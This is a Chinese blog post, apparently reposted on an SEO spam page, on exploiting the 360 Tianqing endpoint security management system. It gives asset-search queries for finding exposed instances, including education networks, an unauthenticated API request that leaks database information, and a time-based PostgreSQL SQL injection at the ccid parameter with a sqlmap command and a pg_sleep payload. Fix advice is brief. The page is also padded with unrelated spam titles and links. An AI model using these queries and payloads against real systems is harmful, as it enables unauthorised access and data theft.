当前位置: 首页 > news >正文

一个网站怎样做两个后台sem工作内容

一个网站怎样做两个后台,sem工作内容,注册个公司一年需要多少费用,凡客诚品网址是多少目录 360天擎 - 未授权与sql注入 信息收集 FOFA语法 鹰图搜索 360天擎未授权访问 - 数据库信息泄露 漏洞复现 修复方案 360天擎终端安全管理系统ccid处SQL注入 漏洞复现 手动测试方法 修复方案 360天擎 - 未授权与sql注入 通常访问的页面如下,存在登录框…

目录

360天擎 - 未授权与sql注入

信息收集

FOFA语法

鹰图搜索

360天擎未授权访问 - 数据库信息泄露

漏洞复现

修复方案

360天擎终端安全管理系统ccid处SQL注入

漏洞复现

手动测试方法

修复方案


360天擎 - 未授权与sql注入

通常访问的页面如下,存在登录框

信息收集

FOFA语法

  1. title="360新天擎"

需重点关注框框的图标,可以聚焦资产搜索

  1. icon_hash="-829652342"

鹰图搜索

这边展现EDUSRC的搜索语法,相对来说资产较少,因为是老洞

  1. web.title="360新天擎"&& ip.isp="教育"

360天擎未授权访问 - 数据库信息泄露

漏洞复现

路由后拼接/api/dbstat/gettablessize

  1. GET /api/dbstat/gettablessize HTTP/1.1
  2. Host: {{Hostname}}

修复方案

未授权更多的是鉴权问题,增加权限校验

360天擎终端安全管理系统ccid处SQL注入

漏洞复现

比较推荐的方式先测试是否存在数据库信息泄露,存在的话大概率存在SQL注入

路由后拼接/api/dp/rptsvcsyncpoint?ccid=1

  1. GET /api/dp/rptsvcsyncpoint?ccid=1 HTTP/1.1
  2. Host: {{Hostname}}

大致页面如下所示

这时候丢到sqlmap中(可能会慢,因为是时间注入)

  1. python .\sqlmap.py --batch -dbs -u https://{{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1

手动测试方法

360天擎用的大概率是PostgreSQL,尝试如下时间注入payload,然后注意页面响应时间

  1. {{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1';SELECT PG_SLEEP(5)--

修复方案

SQL注入类问题更多的是需要进行参数预处理

还没看够?可以关注一下呦~

http://www.mmbaike.com/news/44684.html

相关文章:

  • dede网站怎么做单页面百度大数据搜索引擎
  • 淘宝网站盐酸达泊西汀片是治疗什么的药物
  • 五莲县网站建设四川自助seo建站
  • wordpress 对比站内优化seo
  • 云南省城乡与住房建设厅网站app开发制作
  • 网站默认首页怎么做seo 工具推荐
  • 免费加盟一件代发货源网站含有友情链接的网页
  • 母婴网站源码哪些平台可以发广告
  • 基于html5设计的网站建设网络营销比较成功的企业
  • 网站建设 该如何选好域名搜狗推广管家
  • ps做网站页面设置为多大qq群引流推广平台
  • 提供网站技术支持快优吧seo优化
  • 网络科技公司logo设计网站搜索排名优化
  • 哪家公司网站做的好网络营销和电子商务区别
  • 微信小程序开通要钱吗seo搜索引擎
  • 一般企业做什么网站大庆建站公司
  • 哪个公司做网站最好自助建站网站
  • 秒收的网站百家号seo
  • 免注册个人网站制作建网站一般需要多少钱
  • 政府网站群建设总结西安百度快照优化
  • 网站建设和营销青岛seo推广专员
  • 湛蓝 网站开发长沙网站seo哪家公司好
  • 阜新市建设小学网站windows优化大师会员兑换码
  • 做网站去哪找源码站外推广免费网站
  • 如何做网站大图片宁波网站推广制作
  • 公司做网站好不好网站收录查询工具
  • 合肥市住房和城乡建设局网站深圳今天重大事件新闻
  • 中小企业建站电商平台引流推广
  • 邢台网站优化上海比较大的优化公司
  • 武汉吧哒科技怎么样长沙靠谱关键词优化服务